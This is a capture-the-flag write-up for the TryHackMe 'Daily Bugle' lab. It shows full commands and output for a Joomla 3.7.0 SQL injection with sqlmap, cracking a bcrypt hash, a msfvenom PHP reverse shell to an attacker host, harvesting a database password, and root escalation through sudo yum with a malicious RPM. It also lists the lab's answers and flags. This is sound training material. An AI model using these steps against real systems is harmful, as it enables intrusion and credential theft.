Information
Room
Name: Daily Bugle
Profile: tryhackme.com
Difficulty: Hard
Description : Compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.
Write-up
Overview
Install tools used in this WU on BlackArch Linux:
1 $ sudo pacman -S fingerprinter sqlmap haiti exploitdb metasploit pwncat gtfoblookup rpm-tools
[Task 1] Deploy
Access the web server, who robbed the bank?
Answer:
spiderman
[Task 2] Obtain user and root
What is the Joomla version?
Answer:
3.7.0
1 2 3 4 5 6 7 8 9 10 11 12 $ fingerprinter -a joomla -f http://10.10.48.170/ Unique Match! v3.7.0 - http://10.10.48.170/administrator/manifests/files/joomla.xml -> 5f60cd80d2657d0c4f5b7bd1df2f05ce Unique Match! v3.7.0 - http://10.10.48.170/administrator/language/en-GB/en-GB.xml -> 13409f150e694e3958503b3846b6173f Unique Match! v3.7.0 - http://10.10.48.170/language/en-GB/en-GB.xml -> 91671f23b5debfb674d81ee18aa29dfc Unique Match! v3.7.0 - http://10.10.48.170/administrator/language/en-GB/install.xml -> e2158c14b6c601cca9de1764e635185d Unique Match! v3.7.0 - http://10.10.48.170/language/en-GB/install.xml -> 7dfa1d81271843d868f3e559b096eda6 Unique Match! v3.7.0 - http://10.10.48.170/administrator/manifests/packages/pkg_en-GB.xml -> 3c7f077d2c0fc9dd100c8bb92e6bf933 Intersection of potential versions is only one: v3.7.0 - http://10.10.48.170/administrator/language/en-GB/en-GB.ini -> 1a85a35a9edf33a6e30e47840f5200d8 Intersection of potential versions is only one: v3.7.0 - http://10.10.48.170/administrator/templates/isis/css/template.css -> 33d3849912ba97449ffdc4f1c59a597b Intersection of potential versions is only one: v3.7.0 - http://10.10.48.170/language/en-GB/en-GB.ini -> e941ae1d5df991499c3059396f0e4f93 ... Very likely to be v3.7.0
What is Jonah's cracked password?
Answer:
spiderman123
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 $ searchsploit joomla 3.7.0 ------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------ --------------------------------- Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt ------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results $ searchsploit -p 42033 Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection URL: https://www.exploit-db.com/exploits/42033 Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt File Type: ASCII text, with CRLF line terminators $ sqlmap -u "http://10.10.48.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]' ... --- Parameter: list[fullordering] (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9580 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(9580=9580,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --- [19:45:22] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [19:45:32] [INFO] fetching database names [19:45:36] [INFO] retrieved: 'information_schema' [19:45:38] [INFO] retrieved: 'joomla' [19:45:40] [INFO] retrieved: 'mysql' [19:45:41] [INFO] retrieved: 'performance_schema' [19:45:43] [INFO] retrieved: 'test' available databases [5]: [*] information_schema [*] joomla [*] mysql [*] performance_schema [*] test ... $ sqlmap -u "http://10.10.48.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --random-agent -p 'list[fullordering]' -D joomla -T '#__users' -C username,password --dump ... Database: joomla Table: #__users [1 entry] +----------+--------------------------------------------------------------+ | username | password | +----------+--------------------------------------------------------------+ | jonah | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm | +----------+--------------------------------------------------------------+ ... $ haiti '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' Blowfish(OpenBSD) [HC: 3200] [JtR: bcrypt] Woltlab Burning Board 4.x bcrypt [HC: 3200] [JtR: bcrypt] $ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=bcrypt ... Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status spiderman123 (jonah) 1g 0:00:04:39 DONE (2020-11-11 19:56) 0.003581g/s 167.7p/s 167.7c/s 167.7C/s thebadboy..spaceship Use the "--show" option to display all of the cracked passwords reliably Session completed
What is the user flag?
Answer:
xxx
The login page: http://10.10.48.170/administrator/
Replace a page of a template by a PHP reverse shell at: http://10.10.48.170/administrator/index.php?option=com_templates&view=template&id=506&file=L2Vycm9yLnBocA%3D%3D
Create the PHP reverse shell:
1 $ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.19.77 LPORT=8080 -f raw > noraj.php
Start a listener:
1 2 3 4 5 6 7 8 9 10 $ msfconsole msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp payload => php/meterpreter_reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.9.19.77 LHOST => 10.9.19.77 msf6 exploit(multi/handler) > set LPORT 8080 LPORT => 8080 msf6 exploit(multi/handler) > run
Execute the reverse shell: http://10.10.48.170/templates/protostar/error.php
From the reverse shell:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 python -c 'import pty;pty.spawn("/bin/bash")' bash-4.2$ export TERM=xterm bash-4.2$ id uid=48(apache) gid=48(apache) groups=48(apache) bash-4.2$ pwd /var/www/html/templates/protostar bash-4.2$ cd ../.. bash-4.2$ ls -1 LICENSE.txt README.txt administrator bin cache cli components configuration.php htaccess.txt images includes index.php language layouts libraries media modules plugins robots.txt templates tmp web.config.txt bash-4.2$ cat configuration.php | grep -i password -n 17: public $password = 'nv5uz9r3ZEDzVjNu'; bash-4.2$ head -17 configuration.php | tail -2 public $user = 'root'; public $password = 'nv5uz9r3ZEDzVjNu'; bash-4.2$ ls -l /home drwx------. 2 jjameson jjameson 99 Dec 15 2019 jjameson bash-4.2$ su jjameson Password: nv5uz9r3ZEDzVjNu [jjameson@dailybugle html]$ cd [jjameson@dailybugle ~]$ ls user.txt [jjameson@dailybugle ~]$ cat user.txt 27a260fe3cba712cfdedb1c86d80442e
What is the root flag?
Answer:
xxx
1 2 3 4 5 6 7 8 9 10 11 12 [jjameson@dailybugle ~]$ sudo -l Matching Defaults entries for jjameson on dailybugle: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User jjameson may run the following commands on dailybugle: (ALL) NOPASSWD: /usr/bin/yum
Let's find a way to EoP with yum:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 gtfoblookup linux sudo yum yum: sudo: Description: It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` TF=$(mktemp -d) echo 'id' > $TF/x.sh fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF ``` Code: sudo yum localinstall -y x-1.0-1.noarch.rpm Description: Spawn interactive root shell by loading a custom plugin. Code: TF=$(mktemp -d) cat >$TF/x<<EOF [main] plugins=1 pluginpath=$TF pluginconfpath=$TF EOF cat >$TF/y.conf<<EOF [main] enabled=1 EOF cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh') EOF sudo yum -c $TF/x --enableplugin=y
Install FPM :
1 2 3 $ asdf local ruby 2.7.1 $ gem install --no-document fpm $ sudo pacman -S rpm-tools
Then prepare the exploit:
1 2 3 TF=$(mktemp -d) echo '/bin/sh' > $TF/x.sh $ fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
It created x-1.0-1.noarch.rpm
Serve it with a one line web server:
1 $ ruby -run -ehttpd . -p8080
Then on the target:
1 2 3 4 5 6 7 8 9 [jjameson@dailybugle ~]$ TF=$(mktemp -d) [jjameson@dailybugle ~]$ cd $TF [jjameson@dailybugle tmp.rnJQbjyT19]$ wget http://10.9.19.77:8080/x-1.0-1.noarch.rpm [jjameson@dailybugle tmp.rnJQbjyT19]$ sudo /usr/bin/yum localinstall -y x-1.0-1.noarch.rpm sh-4.2# id uid=0(root) gid=0(root) groups=0(root) sh-4.2# cd sh-4.2# cat root.txt eec3d53292b1821868266858d7fa6f79